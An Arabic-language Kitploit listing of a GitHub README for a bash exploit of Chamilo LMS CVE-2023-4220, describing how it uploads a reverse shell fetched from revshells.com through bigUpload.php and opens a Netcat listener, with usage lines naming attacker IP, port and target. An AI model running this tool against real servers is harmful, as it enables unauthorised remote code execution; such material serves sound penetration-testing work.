Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — استغلال Refurbish لـ Chamilo LMS CVE-2023-4220 مكتوب بلغة bash | Kitploit
أدوات/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

استغلال Refurbish لـ Chamilo LMS CVE-2023-4220 مكتوب بلغة bash

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

استغلال ثغرة CVE-2023-4220 في Chamilo LMS

نظرة عامة

يستغل هذا السكريبت ثغرة تنفيذ الأوامر عن بُعد (RCE) في Chamilo LMS الإصدارات ≤ v1.11.24. توجد الثغرة (CVE-2023-4220) بسبب وظيفة رفع الملفات غير المقيدة في ميزة bigUpload.php في Chamilo LMS، مما يسمح للمهاجمين برفع ملفات عشوائية (مثل القذائف الويب) وتنفيذها، مما يؤدي إلى تنفيذ أوامر كامل عن بُعد على الخادم.

تم تحسين هذا السكريبت بواسطة Divine Clown لتبسيط عملية الاستغلال، حيث يقوم تلقائيًا بإنشاء ملف قذيفة عكسية، ورفعه إلى الهدف، وتشغيل مستمع لمنح المهاجم وصولًا مباشرًا إلى القذيفة.


تفاصيل CVE

  • معرف CVE: CVE-2023-4220
  • البرنامج المتأثر: Chamilo LMS ≤ v1.11.24
  • نوع الثغرة: Remote Code Execution (RCE)
  • متجه الهجوم: رفع ملفات غير مقيدة في /main/inc/lib/javascript/bigupload/inc/bigUpload.php

الميزات

  • يقوم تلقائيًا بتنزيل قذيفة عكسية من revshells.com بناءً على عنوان IP والمنفذ الخاصين بالمهاجم.
  • يرفع القذيفة العكسية باستخدام نقطة النهاية الضعيفة bigUpload.php.
  • يُشغل القذيفة بصمت ويفتح مستمع Netcat للوصول المباشر.

التحسين بواسطة Divine Clown:

  • جميع الخطوات الوسيطة (تنزيل القذيفة، الرفع، إلخ) مخفية، ويعرض فقط القذيفة العكسية الناتجة للاستخدام المبسط.

الاستخدام

root@kitploit:~
./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>

المعلمات:

  • -i <attacker_ip>: عنوان IP للمهاجم للقذيفة العكسية.
  • -p <port>: المنفذ الذي سيتم تشغيل مستمع Netcat عليه.
  • -h <host_link>: الرابط الكامل لمثيل Chamilo LMS الضعيف.

مثال:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

المتطلبات الأساسية

  • تثبيت Netcat على جهازك.
  • تأكد من أن إصدار Chamilo LMS الهدف ضعيف (≤ v1.11.24).
  • الحصول على الأذونات المناسبة لإجراء اختبار الاختراق أو الاستغلال.

التحليل التقني

  1. يقوم السكريبت بتنزيل قذيفة عكسية من revshells.com، ويقوم بتوليدها ديناميكيًا بناءً على عنوان IP والمنفذ الخاصين بالمهاجم.
  2. يتم رفع القذيفة العكسية إلى نقطة النهاية الضعيفة bigUpload.php.
  3. يتم تنفيذ الملف المرفوع عن طريق الوصول إلى عنوان URL الخاص به على الخادم.
  4. يتم تشغيل مستمع Netcat، وبمجرد تشغيل الملف، يتم إنشاء اتصال قذيفة عكسية، مما يمنح المهاجم وصولًا إلى سطر الأوامر.

إخلاء مسؤولية قانوني

هذه الأداة مخصصة فقط للأغراض التعليمية وبيئات الاختبار حيث لديك إذن صريح لاستغلال الثغرات. الوصول غير المصرح به إلى الأنظمة غير قانوني وقد يؤدي إلى تهم جنائية. لن يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا السكريبت.


الإسناد

  • المؤلف الأصلي للاستغلال: Ziad Sakr @Ziad-Sakr
  • التحسينات والتنقيحات: أنا (Divine Clown)

لا تتردد في تعديل ملف README أكثر إذا كنت ترغب في تضمين أي معلومات إضافية أو تنسيق! أخبرني إذا كنت بحاجة إلى أي شيء آخر.

تنزيل الأداة